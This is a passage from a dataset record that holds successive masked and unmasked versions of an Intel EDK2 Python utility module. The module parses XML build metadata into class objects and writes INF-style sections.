"step-3": "<mask token>\n\n\ndef SetCommon(Common, XmlCommon):\n XmlTag = 'Usage'\n Common.Usage = XmlAttribute(XmlCommon, XmlTag).split()\n XmlTag = 'FeatureFlag'\n Common.FeatureFlag = XmlAttribute(XmlCommon, XmlTag)\n XmlTag = 'SupArchList'\n Common.SupArchList = XmlAttribute(XmlCommon, XmlTag).split()\n XmlTag = XmlNodeName(XmlCommon) + '/' + 'HelpText'\n Common.HelpText = XmlElement(XmlCommon, XmlTag)\n\n\ndef SetIdentification(CommonHeader, XmlCommonHeader, NameTag, FileName):\n XmlParentTag = XmlNodeName(XmlCommonHeader)\n XmlTag = XmlParentTag + '/' + NameTag\n CommonHeader.Name = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParentTag + '/' + 'GuidValue'\n CommonHeader.Guid = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParentTag + '/' + 'Version'\n CommonHeader.Version = XmlElement(XmlCommonHeader, XmlTag)\n CommonHeader.FileName = os.path.basename(FileName)\n CommonHeader.FullPath = os.path.abspath(FileName)\n\n\n<mask token>\n\n\ndef AddToSpecificationDict(SpecificationDict, SpecificationString):\n \"\"\"Abstract specification name, value pair from Specification String\"\"\"\n for SpecificationMatch in mReSpecification.finditer(SpecificationString):\n Specification = SpecificationMatch.group('Specification')\n Value = SpecificationMatch.group('Value')\n SpecificationDict[Specification] = Value\n\n\ndef SetCommonHeader(CommonHeader, XmlCommonHeader):\n \"\"\"Set all attributes of CommonHeaderClass object from XmlCommonHeader\"\"\"\n XmlParent = XmlNodeName(XmlCommonHeader)\n XmlTag = XmlParent + '/' + 'Abstract'\n CommonHeader.Abstract = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'Description'\n CommonHeader.Description = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'Copyright'\n CommonHeader.Copyright = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'License'\n CommonHeader.License = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'Specification'\n Specification = XmlElement(XmlCommonHeader, XmlTag)\n AddToSpecificationDict(CommonHeader.Specification, Specification)\n XmlTag = XmlParent + '/' + 'ModuleType'\n CommonHeader.ModuleType = XmlElement(XmlCommonHeader, XmlTag)\n\n\ndef LoadClonedRecord(XmlCloned):\n ClonedRecord = ClonedRecordClass()\n XmlTag = 'Id'\n ClonedRecord.Id = int(XmlAttribute(XmlCloned, XmlTag))\n XmlTag = 'FarGuid'\n ClonedRecord.FarGuid = XmlAttribute(XmlCloned, XmlTag)\n XmlTag = 'Cloned/PackageGuid'\n ClonedRecord.PackageGuid = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/PackageVersion'\n ClonedRecord.PackageVersion = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/ModuleGuid'\n ClonedRecord.ModuleGuid = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/ModuleVersion'\n ClonedRecord.ModuleVersion = XmlElement(XmlCloned, XmlTag)\n return ClonedRecord\n\n\ndef LoadGuidProtocolPpiCommon(XmlGuidProtocolPpiCommon):\n GuidProtocolPpiCommon = GuidProtocolPpiCommonClass()\n XmlTag = 'Name'\n GuidProtocolPpiCommon.Name = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n XmlParent = XmlNodeName(XmlGuidProtocolPpiCommon)\n if XmlParent == 'Entry':\n XmlTag = '%s/C_Name' % XmlParent\n elif XmlParent == 'GuidCNames':\n XmlTag = '%s/GuidCName' % XmlParent\n else:\n XmlTag = '%s/%sCName' % (XmlParent, XmlParent)\n GuidProtocolPpiCommon.CName = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)\n XmlTag = XmlParent + '/' + 'GuidValue'\n GuidProtocolPpiCommon.Guid = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)\n if XmlParent.endswith('Notify'):\n GuidProtocolPpiCommon.Notify = True\n XmlTag = 'GuidTypeList'\n GuidTypes = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n GuidProtocolPpiCommon.GuidTypeList = GuidTypes.split()\n XmlTag = 'SupModuleList'\n SupModules = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n GuidProtocolPpiCommon.SupModuleList = SupModules.split()\n SetCommon(GuidProtocolPpiCommon, XmlGuidProtocolPpiCommon)\n return GuidProtocolPpiCommon\n\n\ndef LoadPcd(XmlPcd):\n \"\"\"Return a new PcdClass object equivalent to XmlPcd\"\"\"\n Pcd = PcdClass()\n XmlTag = 'PcdEntry/C_Name'\n Pcd.CName = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/Token'\n Pcd.Token = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/TokenSpaceGuidCName'\n Pcd.TokenSpaceGuidCName = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/DatumType'\n Pcd.DatumType = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/MaxDatumSize'\n Pcd.MaxDatumSize = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/DefaultValue'\n Pcd.DefaultValue = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdItemType'\n Pcd.ItemType = XmlAttribute(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/ValidUsage'\n Pcd.ValidUsage = XmlElement(XmlPcd, XmlTag).split()\n XmlTag = 'SupModuleList'\n Pcd.SupModuleList = XmlAttribute(XmlPcd, XmlTag).split()\n SetCommon(Pcd, XmlPcd)\n return Pcd\n\n\ndef LoadLibraryClass(XmlLibraryClass):\n LibraryClass = LibraryClassClass()\n XmlTag = 'LibraryClass/Keyword'\n LibraryClass.LibraryClass = XmlElement(XmlLibraryClass, XmlTag)\n if LibraryClass.LibraryClass == '':\n XmlTag = 'Name'\n LibraryClass.LibraryClass = XmlAttribute(XmlLibraryClass, XmlTag)\n XmlTag = 'LibraryClass/IncludeHeader'\n LibraryClass.IncludeHeader = XmlElement(XmlLibraryClass, XmlTag)\n XmlTag = 'RecommendedInstanceVersion'\n RecommendedInstanceVersion = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.RecommendedInstanceVersion = RecommendedInstanceVersion\n XmlTag = 'RecommendedInstanceGuid'\n RecommendedInstanceGuid = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.RecommendedInstanceGuid = RecommendedInstanceGuid\n XmlTag = 'SupModuleList'\n SupModules = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.SupModuleList = SupModules.split()\n SetCommon(LibraryClass, XmlLibraryClass)\n return LibraryClass\n\n\ndef LoadBuildOption(XmlBuildOption):\n \"\"\"Return a new BuildOptionClass object equivalent to XmlBuildOption\"\"\"\n BuildOption = BuildOptionClass()\n BuildOption.Option = XmlElementData(XmlBuildOption)\n XmlTag = 'BuildTargets'\n BuildOption.BuildTargetList = XmlAttribute(XmlBuildOption, XmlTag).split()\n XmlTag = 'ToolChainFamily'\n BuildOption.ToolChainFamily = XmlAttribute(XmlBuildOption, XmlTag)\n XmlTag = 'TagName'\n BuildOption.TagName = XmlAttribute(XmlBuildOption, XmlTag)\n XmlTag = 'ToolCode'\n BuildOption.ToolCode = XmlAttribute(XmlBuildOption, XmlTag)\n XmlTag = 'SupArchList'\n BuildOption.SupArchList = XmlAttribute(XmlBuildOption, XmlTag).split()\n return BuildOption\n\n\ndef LoadUserExtensions(XmlUserExtensions):\n UserExtensions = UserExtensionsClass()\n XmlTag = 'UserID'\n UserExtensions.UserID = XmlAttribute(XmlUserExtensions, XmlTag)\n XmlTag = 'Identifier'\n UserExtensions.Identifier = XmlAttribute(XmlUserExtensions, XmlTag)\n UserExtensions.Content = XmlElementData(XmlUserExtensions)\n return UserExtensions\n\n\ndef StoreTextFile(TextFile, Content):\n EdkLogger.verbose(Content)\n TextFile.write(Content)\n\n\ndef AddToSection(Section, Arch, Item):\n SectionArch = Section.get(Arch, [])\n if Item not in SectionArch:\n SectionArch.append(Item)\n Section[Arch] = SectionArch\n\n\ndef GetSection(SectionName, Method, ObjectList):\n SupportedArches = ['common', 'Ia32', 'X64', 'Ipf', 'Ebc', 'ARM', 'AARCH64']\n SectionDict = {}\n for Object in ObjectList:\n Item = Method(Object)\n if Item == '':\n continue\n Item = ' %s' % Item\n Arches = Object.SupArchList\n if len(Arches) == 0:\n AddToSection(SectionDict, 'common', Item)\n else:\n for Arch in SupportedArches:\n if Arch.upper() in Arches:\n AddToSection(SectionDict, Arch, Item)\n Section = ''\n for Arch in SupportedArches:\n SectionArch = '\\n'.join(SectionDict.get(Arch, []))\n if SectionArch != '':\n Section += '[%s.%s]\\n%s\\n' % (SectionName, Arch, SectionArch)\n Section += '\\n'\n if Section != '':\n Section += '\\n'\n return Section\n\n\ndef StoreHeader(TextFile, CommonHeader):\n CopyRight = CommonHeader.Copyright\n Abstract = CommonHeader.Abstract\n Description = CommonHeader.Description\n License = CommonHeader.License\n Header = '#/** @file\\n#\\n'\n Header += '# ' + Abstract + '\\n#\\n'\n Header += '# ' + Description.strip().replace('\\n', '\\n# ') + '\\n'\n Header += '# ' + CopyRight + '\\n#\\n'\n Header += '# ' + License.replace('\\n', '\\n# ').replace(' ', ' ')\n Header += '\\n#\\n#**/\\n\\n'\n StoreTextFile(TextFile, Header)\n\n\ndef StoreDefinesSection(TextFile, DefinesTupleList):\n Section = '[Defines]\\n'\n for DefineItem in DefinesTupleList:\n Section += ' %-30s = %s\\n' % DefineItem\n Section += '\\n\\n'\n StoreTextFile(TextFile, Section)\n\n\ndef GetUserExtensions(UserExtensions):\n UserId = UserExtensions.UserID\n Identifier = UserExtensions.Identifier\n Content = UserExtensions.Content\n return '[UserExtensions.%s.%s]\\n %s\\n\\n' % (UserId, Identifier, Content)\n\n\n<mask token>\n\n\ndef GetTextFileInfo(FileName, TagTuple):\n ValueTuple = [''] * len(TagTuple)\n try:\n for Line in open(FileName):\n Line = Line.split('#', 1)[0]\n MatchEquation = mReEquation.match(Line)\n if MatchEquation:\n Tag = MatchEquation.group(1).upper()\n Value = MatchEquation.group(2)\n for Index in range(len(TagTuple)):\n if TagTuple[Index] == Tag:\n ValueTuple[Index] = Value\n except:\n EdkLogger.info('IO Error in reading file %s' % FileName)\n return ValueTuple\n\n\ndef GetXmlFileInfo(FileName, TagTuple):\n XmlDom = XmlParseFile(FileName)\n return tuple([XmlElement(XmlDom, XmlTag) for XmlTag in TagTuple])\n\n\ndef MigrationOptionParser(Source, Destinate, ToolName, VersionNumber=1.0):\n UsageString = '%s [-a] [-v|-q] [-o <output_file>] <input_file>' % ToolName\n Version = '%s Version %.2f' % (ToolName, VersionNumber)\n Copyright = 'Copyright (c) 2007, Intel Corporation. All rights reserved.'\n Parser = OptionParser(description=Copyright, version=Version, usage=\n UsageString)\n Parser.add_option('-o', '--output', dest='OutputFile', help=\n 'The name of the %s file to be created.' % Destinate)\n Parser.add_option('-a', '--auto', dest='AutoWrite', action='store_true',\n default=False, help=\n 'Automatically create the %s file using the name of the %s file and replacing file extension'\n % (Source, Destinate))\n Parser.add_option('-q', '--quiet', action='store_true', type=None, help\n ='Disable all messages except FATAL ERRORS.')\n Parser.add_option('-v', '--verbose', action='store_true', type=None,\n help='Turn on verbose output with informational messages printed.')\n Options, Args = Parser.parse_args()\n if Options.verbose:\n EdkLogger.setLevel(EdkLogger.VERBOSE)\n elif Options.quiet:\n EdkLogger.setLevel(EdkLogger.QUIET)\n else:\n EdkLogger.setLevel(EdkLogger.INFO)\n if len(Args) == 0:\n raise MigrationError(PARAMETER_MISSING, name='Input file', usage=\n Parser.get_usage())\n if len(Args) > 1:\n raise MigrationError(PARAMETER_INVALID, name='Too many input files',\n usage=Parser.get_usage())\n InputFile = Args[0]\n if not os.path.exists(InputFile):\n raise MigrationError(FILE_NOT_FOUND, name=InputFile)\n if Options.OutputFile:\n if Options.AutoWrite:\n raise MigrationError(OPTION_CONFLICT, arg1='-o', arg2='-a',\n usage=Parser.get_usage())\n elif Options.AutoWrite:\n Options.OutputFile = os.path.splitext(InputFile)[0\n ] + '.' + Destinate.lower()\n else:\n raise MigrationError(OPTION_MISSING, name='-o', usage=Parser.\n get_usage())\n return Options, InputFile\n\n\nif __name__ == '__main__':\n pass\n",
"step-4": "<mask token>\n\n\ndef SetCommon(Common, XmlCommon):\n XmlTag = 'Usage'\n Common.Usage = XmlAttribute(XmlCommon, XmlTag).split()\n XmlTag = 'FeatureFlag'\n Common.FeatureFlag = XmlAttribute(XmlCommon, XmlTag)\n XmlTag = 'SupArchList'\n Common.SupArchList = XmlAttribute(XmlCommon, XmlTag).split()\n XmlTag = XmlNodeName(XmlCommon) + '/' + 'HelpText'\n Common.HelpText = XmlElement(XmlCommon, XmlTag)\n\n\ndef SetIdentification(CommonHeader, XmlCommonHeader, NameTag, FileName):\n XmlParentTag = XmlNodeName(XmlCommonHeader)\n XmlTag = XmlParentTag + '/' + NameTag\n CommonHeader.Name = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParentTag + '/' + 'GuidValue'\n CommonHeader.Guid = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParentTag + '/' + 'Version'\n CommonHeader.Version = XmlElement(XmlCommonHeader, XmlTag)\n CommonHeader.FileName = os.path.basename(FileName)\n CommonHeader.FullPath = os.path.abspath(FileName)\n\n\nmReSpecification = re.compile('(?P<Specification>\\\\w+)\\\\s+(?P<Value>\\\\w*)')\n\n\ndef AddToSpecificationDict(SpecificationDict, SpecificationString):\n \"\"\"Abstract specification name, value pair from Specification String\"\"\"\n for SpecificationMatch in mReSpecification.finditer(SpecificationString):\n Specification = SpecificationMatch.group('Specification')\n Value = SpecificationMatch.group('Value')\n SpecificationDict[Specification] = Value\n\n\ndef SetCommonHeader(CommonHeader, XmlCommonHeader):\n \"\"\"Set all attributes of CommonHeaderClass object from XmlCommonHeader\"\"\"\n XmlParent = XmlNodeName(XmlCommonHeader)\n XmlTag = XmlParent + '/' + 'Abstract'\n CommonHeader.Abstract = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'Description'\n CommonHeader.Description = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'Copyright'\n CommonHeader.Copyright = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'License'\n CommonHeader.License = XmlElement(XmlCommonHeader, XmlTag)\n XmlTag = XmlParent + '/' + 'Specification'\n Specification = XmlElement(XmlCommonHeader, XmlTag)\n AddToSpecificationDict(CommonHeader.Specification, Specification)\n XmlTag = XmlParent + '/' + 'ModuleType'\n CommonHeader.ModuleType = XmlElement(XmlCommonHeader, XmlTag)\n\n\ndef LoadClonedRecord(XmlCloned):\n ClonedRecord = ClonedRecordClass()\n XmlTag = 'Id'\n ClonedRecord.Id = int(XmlAttribute(XmlCloned, XmlTag))\n XmlTag = 'FarGuid'\n ClonedRecord.FarGuid = XmlAttribute(XmlCloned, XmlTag)\n XmlTag = 'Cloned/PackageGuid'\n ClonedRecord.PackageGuid = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/PackageVersion'\n ClonedRecord.PackageVersion = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/ModuleGuid'\n ClonedRecord.ModuleGuid = XmlElement(XmlCloned, XmlTag)\n XmlTag = 'Cloned/ModuleVersion'\n ClonedRecord.ModuleVersion = XmlElement(XmlCloned, XmlTag)\n return ClonedRecord\n\n\ndef LoadGuidProtocolPpiCommon(XmlGuidProtocolPpiCommon):\n GuidProtocolPpiCommon = GuidProtocolPpiCommonClass()\n XmlTag = 'Name'\n GuidProtocolPpiCommon.Name = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n XmlParent = XmlNodeName(XmlGuidProtocolPpiCommon)\n if XmlParent == 'Entry':\n XmlTag = '%s/C_Name' % XmlParent\n elif XmlParent == 'GuidCNames':\n XmlTag = '%s/GuidCName' % XmlParent\n else:\n XmlTag = '%s/%sCName' % (XmlParent, XmlParent)\n GuidProtocolPpiCommon.CName = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)\n XmlTag = XmlParent + '/' + 'GuidValue'\n GuidProtocolPpiCommon.Guid = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)\n if XmlParent.endswith('Notify'):\n GuidProtocolPpiCommon.Notify = True\n XmlTag = 'GuidTypeList'\n GuidTypes = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n GuidProtocolPpiCommon.GuidTypeList = GuidTypes.split()\n XmlTag = 'SupModuleList'\n SupModules = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)\n GuidProtocolPpiCommon.SupModuleList = SupModules.split()\n SetCommon(GuidProtocolPpiCommon, XmlGuidProtocolPpiCommon)\n return GuidProtocolPpiCommon\n\n\ndef LoadPcd(XmlPcd):\n \"\"\"Return a new PcdClass object equivalent to XmlPcd\"\"\"\n Pcd = PcdClass()\n XmlTag = 'PcdEntry/C_Name'\n Pcd.CName = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/Token'\n Pcd.Token = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/TokenSpaceGuidCName'\n Pcd.TokenSpaceGuidCName = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/DatumType'\n Pcd.DatumType = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/MaxDatumSize'\n Pcd.MaxDatumSize = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/DefaultValue'\n Pcd.DefaultValue = XmlElement(XmlPcd, XmlTag)\n XmlTag = 'PcdItemType'\n Pcd.ItemType = XmlAttribute(XmlPcd, XmlTag)\n XmlTag = 'PcdEntry/ValidUsage'\n Pcd.ValidUsage = XmlElement(XmlPcd, XmlTag).split()\n XmlTag = 'SupModuleList'\n Pcd.SupModuleList = XmlAttribute(XmlPcd, XmlTag).split()\n SetCommon(Pcd, XmlPcd)\n return Pcd\n\n\ndef LoadLibraryClass(XmlLibraryClass):\n LibraryClass = LibraryClassClass()\n XmlTag = 'LibraryClass/Keyword'\n LibraryClass.LibraryClass = XmlElement(XmlLibraryClass, XmlTag)\n if LibraryClass.LibraryClass == '':\n XmlTag = 'Name'\n LibraryClass.LibraryClass = XmlAttribute(XmlLibraryClass, XmlTag)\n XmlTag = 'LibraryClass/IncludeHeader'\n LibraryClass.IncludeHeader = XmlElement(XmlLibraryClass, XmlTag)\n XmlTag = 'RecommendedInstanceVersion'\n RecommendedInstanceVersion = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.RecommendedInstanceVersion = RecommendedInstanceVersion\n XmlTag = 'RecommendedInstanceGuid'\n RecommendedInstanceGuid = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.RecommendedInstanceGuid = RecommendedInstanceGuid\n XmlTag = 'SupModuleList'\n SupModules = XmlAttribute(XmlLibraryClass, XmlTag)\n LibraryClass.SupModuleList = SupModules.split()\n SetCommon(LibraryClass, XmlLibraryClass)\n return LibraryClass\n\n\ndef LoadBuildOption(XmlBuildOption):\n \"\"\"Return a new BuildOptionClass object equivalent to XmlBuildOption\"\"\"\n BuildOption = BuildOptionClass()\n BuildOption.Option = XmlElementData(XmlBuildOption)\n XmlTag = 'BuildTargets'\n BuildOption.BuildTargetList = XmlAttribute(XmlBuildOption, XmlTag).split()\n XmlTag = 'ToolChainFamily'\n BuildOption.ToolChainFamily = XmlAttribute(XmlBuildOption, XmlTag)\n XmlTag = 'TagName'\n BuildOption.TagName = XmlAttribute(XmlBuildOption, XmlTag)\n XmlTag = 'ToolCode'\n BuildOption.ToolCode = XmlAttribute(XmlBuildOption, XmlTag)\n XmlTag = 'SupArchList'\n BuildOption.SupArchList = XmlAttribute(XmlBuildOption, XmlTag).split()\n return BuildOption\n\n\ndef LoadUserExtensions(XmlUserExtensions):\n UserExtensions = UserExtensionsClass()\n XmlTag = 'UserID'\n UserExtensions.UserID = XmlAttribute(XmlUserExtensions, XmlTag)\n XmlTag = 'Identifier'\n UserExtensions.Identifier = XmlAttribute(XmlUserExtensions, XmlTag)\n UserExtensions.Content = XmlElementData(XmlUserExtensions)\n return UserExtensions\n\n\ndef StoreTextFile(TextFile, Content):\n EdkLogger.verbose(Content)\n TextFile.write(Content)\n\n\ndef AddToSection(Section, Arch, Item):\n SectionArch = Section.get(Arch, [])\n if Item not in SectionArch:\n SectionArch.append(Item)\n Section[Arch] = SectionArch\n\n\ndef GetSection(SectionName, Method, ObjectList):\n SupportedArches = ['common', 'Ia32', 'X64', 'Ipf', 'Ebc', 'ARM', 'AARCH64']\n SectionDict = {}\n for Object in ObjectList:\n Item = Method(Object)\n if Item == '':\n continue\n Item = ' %s' % Item\n Arches = Object.SupArchList\n if len(Arches) == 0:\n AddToSection(SectionDict, 'common', Item)\n else:\n for Arch in SupportedArches:\n if Arch.upper() in Arches:\n AddToSection(SectionDict, Arch, Item)\n Section = ''\n for Arch in SupportedArches:\n SectionArch = '\\n'.join(SectionDict.get(Arch, []))\n if SectionArch != '':\n Section += '[%s.%s]\\n%s\\n' % (SectionName, Arch, SectionArch)\n Section += '\\n'\n if Section != '':\n Section += '\\n'\n return Section\n\n\ndef StoreHeader(TextFile, CommonHeader):\n CopyRight = CommonHeader.Copyright\n Abstract = CommonHeader.Abstract\n Description = CommonHeader.Description\n License = CommonHeader.License\n Header = '#/** @file\\n#\\n'\n Header += '# ' + Abstract + '\\n#\\n'\n Header += '# ' + Description.strip().replace('\\n', '\\n# ') + '\\n'\n Header += '# ' + CopyRight + '\\n#\\n'\n Header += '# ' + License.replace('\\n', '\\n# ').replace(' ', ' ')\n Header += '\\n#\\n#**/\\n\\n'\n StoreTextFile(TextFile, Header)\n\n\ndef StoreDefinesSection(TextFile, DefinesTupleList):\n Section = '[Defines]\\n'\n for DefineItem in DefinesTupleList:\n Section += ' %-30s = %s\\n' % DefineItem\n Section += '\\n\\n'\n StoreTextFile(TextFile, Section)\n\n\ndef GetUserExtensions(UserExtensions):\n UserId = UserExtensions.UserID\n Identifier = UserExtensions.Identifier\n Content = UserExtensions.Content\n return '[UserExtensions.%s.%s]\\n %s\\n\\n' % (UserId, Identifier, Content)\n\n\nmReEquation = re.compile('\\\\s*(\\\\S+)\\\\s*=\\\\s*(\\\\S*)\\\\s*')\n\n\ndef GetTextFileInfo(FileName, TagTuple):\n ValueTuple = [''] * len(TagTuple)\n try:\n for Line in open(FileName):\n Line = Line.split('#', 1)[0]\n MatchEquation = mReEquation.match(Line)\n if MatchEquation:\n Tag = MatchEquation.group(1).upper()\n Value = MatchEquation.group(2)\n for Index in range(len(TagTuple)):\n if TagTuple[Index] == Tag:\n ValueTuple[Index] = Value\n except:\n EdkLogger.info('IO Error in reading file %s' % FileName)\n return ValueTuple\n\n\ndef GetXmlFileInfo(FileName, TagTuple):\n XmlDom = XmlParseFile(FileName)\n return tuple([XmlElement(XmlDom, XmlTag) for XmlTag in TagTuple])\n\n\ndef MigrationOptionParser(Source, Destinate, ToolName, VersionNumber=1.0):\n UsageString = '%s [-a] [-v|-q] [-o <output_file>] <input_file>' % ToolName\n Version = '%s Version %.2f' % (ToolName, VersionNumber)\n Copyright = 'Copyright (c) 2007, Intel Corporation. All rights reserved.'\n Parser = OptionParser(description=Copyright, version=Version, usage=\n UsageString)\n Parser.add_option('-o', '--output', dest='OutputFile', help=\n 'The name of the %s file to be created.' % Destinate)\n Parser.add_option('-a', '--auto', dest='AutoWrite', action='store_true',\n default=False, help=\n 'Automatically create the %s file using the name of the %s file and replacing file extension'\n % (Source, Destinate))\n Parser.add_option('-q', '--quiet', action='store_true', type=None, help\n ='Disable all messages except FATAL ERRORS.')\n Parser.add_option('-v', '--verbose', action='store_true', type=None,\n help='Turn on verbose output with informational messages printed.')\n Options, Args = Parser.parse_args()\n if Options.verbose:\n EdkLogger.setLevel(EdkLogger.VERBOSE)\n elif Options.quiet:\n EdkLogger.setLevel(EdkLogger.QUIET)\n else:\n EdkLogger.setLevel(EdkLogger.INFO)\n if len(Args) == 0:\n raise MigrationError(PARAMETER_MISSING, name='Input file', usage=\n Parser.get_usage())\n if len(Args) > 1:\n raise MigrationError(PARAMETER_INVALID, name='Too many input files',\n usage=Parser.get_usage())\n InputFile = Args[0]\n if not os.path.exists(InputFile):\n raise MigrationError(FILE_NOT_FOUND, name=InputFile)\n if Options.OutputFile:\n if Options.AutoWrite:\n raise MigrationError(OPTION_CONFLICT, arg1='-o', arg2='-a',\n usage=Parser.get_usage())\n elif Options.AutoWrite:\n Options.OutputFile = os.path.splitext(InputFile)[0\n ] + '.' + Destinate.lower()\n else:\n raise MigrationError(OPTION_MISSING, name='-o', usage=Parser.\n get_usage())\n return Options, InputFile\n\n\nif __name__ == '__main__':\n pass\n",
"step-5": "## @file\n# Contains several utilitities shared by migration tools.\n#\n# Copyright (c) 2007 - 2014, Intel Corporation. All rights reserved.<BR>\n# This program and the accompanying materials\n# are licensed and made available under the terms and conditions of the BSD License\n# which accompanies this distribution. The full text of the license may be found at\n# http://opensource.org/licenses/bsd-license.php\n#\n# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.\n#\n\n##\n# Import Modules\n#\nimport Common.LongFilePathOs as os\nimport re\nimport EdkLogger\nfrom optparse import OptionParser\nfrom Common.BuildToolError import *\nfrom XmlRoutines import *\nfrom CommonDataClass.CommonClass import *\nfrom Common.LongFilePathSupport import OpenLongFilePath as open\n\n## Set all fields of CommonClass object.\n#\n# Set all attributes of CommonClass object from XML Dom object of XmlCommon.\n#\n# @param Common The destine CommonClass object.\n# @param XmlCommon The source XML Dom object.\n#\ndef SetCommon(Common, XmlCommon):\n XmlTag = \"Usage\"\n Common.Usage = XmlAttribute(XmlCommon, XmlTag).split()\n\n XmlTag = \"FeatureFlag\"\n Common.FeatureFlag = XmlAttribute(XmlCommon, XmlTag)\n\n XmlTag = \"SupArchList\"\n Common.SupArchList = XmlAttribute(XmlCommon, XmlTag).split()\n\n XmlTag = XmlNodeName(XmlCommon) + \"/\" + \"HelpText\"\n Common.HelpText = XmlElement(XmlCommon, XmlTag)\n\n\n## Set some fields of CommonHeaderClass object.\n#\n# Set Name, Guid, FileName and FullPath fields of CommonHeaderClass object from\n# XML Dom object of XmlCommonHeader, NameTag and FileName.\n#\n# @param CommonHeader The destine CommonClass object.\n# @param XmlCommonHeader The source XML Dom object.\n# @param NameTag The name tag in XML Dom object.\n# @param FileName The file name of the XML file.\n#\ndef SetIdentification(CommonHeader, XmlCommonHeader, NameTag, FileName):\n XmlParentTag = XmlNodeName(XmlCommonHeader)\n\n XmlTag = XmlParentTag + \"/\" + NameTag\n CommonHeader.Name = XmlElement(XmlCommonHeader, XmlTag)\n\n XmlTag = XmlParentTag + \"/\" + \"GuidValue\"\n CommonHeader.Guid = XmlElement(XmlCommonHeader, XmlTag)\n\n XmlTag = XmlParentTag + \"/\" + \"Version\"\n CommonHeader.Version = XmlElement(XmlCommonHeader, XmlTag)\n\n CommonHeader.FileName = os.path.basename(FileName)\n CommonHeader.FullPath = os.path.abspath(FileName)\n\n\n## Regular expression to match specification and value.\nmReSpecification = re.compile(r\"(?P<Specification>\\w+)\\s+(?P<Value>\\w*)\")\n\n## Add specification to specification dictionary.\n#\n# Abstract specification name, value pair from Specification String and add them\n# to specification dictionary.\n#\n# @param SpecificationDict The destine Specification dictionary.\n# @param SpecificationString The source Specification String from which the\n# specification name and value pair is abstracted.\n#\ndef AddToSpecificationDict(SpecificationDict, SpecificationString):\n \"\"\"Abstract specification name, value pair from Specification String\"\"\"\n for SpecificationMatch in mReSpecification.finditer(SpecificationString):\n Specification = SpecificationMatch.group(\"Specification\")\n Value = SpecificationMatch.group(\"Value\")\n SpecificationDict[Specification] = Value\n\n## Set all fields of CommonHeaderClass object.\n#\n# Set all attributes of CommonHeaderClass object from XML Dom object of\n# XmlCommonHeader, NameTag and FileName.\n#\n# @param CommonHeader The destine CommonClass object.\n# @param XmlCommonHeader The source XML Dom object.\n# @param NameTag The name tag in XML Dom object.\n# @param FileName The file name of the XML file.\n#\ndef SetCommonHeader(CommonHeader, XmlCommonHeader):\n \"\"\"Set all attributes of CommonHeaderClass object from XmlCommonHeader\"\"\"\n XmlParent = XmlNodeName(XmlCommonHeader)\n\n XmlTag = XmlParent + \"/\" + \"Abstract\"\n CommonHeader.Abstract = XmlElement(XmlCommonHeader, XmlTag)\n\n XmlTag = XmlParent + \"/\" + \"Description\"\n CommonHeader.Description = XmlElement(XmlCommonHeader, XmlTag)\n\n XmlTag = XmlParent + \"/\" + \"Copyright\"\n CommonHeader.Copyright = XmlElement(XmlCommonHeader, XmlTag)\n\n XmlTag = XmlParent + \"/\" + \"License\"\n CommonHeader.License = XmlElement(XmlCommonHeader, XmlTag)\n\n XmlTag = XmlParent + \"/\" + \"Specification\"\n Specification = XmlElement(XmlCommonHeader, XmlTag)\n\n AddToSpecificationDict(CommonHeader.Specification, Specification)\n\n XmlTag = XmlParent + \"/\" + \"ModuleType\"\n CommonHeader.ModuleType = XmlElement(XmlCommonHeader, XmlTag)\n\n\n## Load a new Cloned Record class object.\n#\n# Read an input XML ClonedRecord DOM object and return an object of Cloned Record\n# contained in the DOM object.\n#\n# @param XmlCloned A child XML DOM object in a Common XML DOM.\n#\n# @retvel ClonedRecord A new Cloned Record object created by XmlCloned.\n#\ndef LoadClonedRecord(XmlCloned):\n ClonedRecord = 